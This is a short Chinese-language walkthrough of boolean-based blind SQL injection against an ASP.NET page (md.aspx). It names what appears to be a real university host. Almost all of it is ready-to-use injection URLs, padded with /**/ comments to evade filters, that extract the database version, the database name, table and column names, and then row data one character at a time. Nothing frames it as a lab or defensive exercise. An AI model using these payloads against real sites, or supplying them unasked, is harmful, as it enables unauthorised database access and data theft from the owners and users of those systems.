--+
先说一些函数的说明: substring(str,start,len) 截取字符串的作用,第一个参数为要截取的字符串,第二个参数为从哪里开始截取,第三个参数为截取的长度 ascii(char) 把字符转换为ascii值
--+
爆数据库版本: md.aspx?c=c1'/**/and/**/ascii(substring(@@version,1,1))>0-- 正常页面 wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring(@@version,1,1))>100-- 不正常页面 说明@@version的第一个字母的ascii 的范围是在0到100 之间 md.aspx?c=c1'/**/and/**/ascii(substring(@@version,1,1))=77-- 正常页面,说明@@version的第一个字母的ascii 的值是77,查表可知为M 第二个字母的注入为: md.aspx?c=c1'/**/and/**/ascii(substring(@@version,2,1))>0--
爆当前数据库名字:
md.aspx?c=c1'/**/and/**/ascii(substring(db_name(),1,1))>200--
其他字符按爆版本号方法类似
爆表:
md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1 name/**/from/**/库.sys.all_objects where type='U'/**/AND/**/is_ms_shipped=0),1,1))>0/**/--&t=0
爆第二张表:
md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1/**/name/**/from/**/库.sys.all_objects where type='U'/**/AND/**/is_ms_shipped=0 and name not in('表1')),1,1))>0/**/--&t=0
爆表的字段: md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1/**/COLUMN_NAME from/**/库.information_schema.columns/**/where/** /TABLE_NAME='表名1'),1,1))>0/**/--&t=0
爆第二个字段:
md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1/**/COLUMN_NAME/**/ from/**/库.information_schema.columns/**/where/** /TABLE_NAME='表名1'/**/and/**/COLUMN_NAME/**/not/**/in('字段1')),1,1))>0/**/--&t=0
爆数据:
md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1/**/字段1/**/from/**/表名),1,1))>0/**/--&t=0
对于这种注入, 如果能用工具, 就用工具, 因为特别的麻烦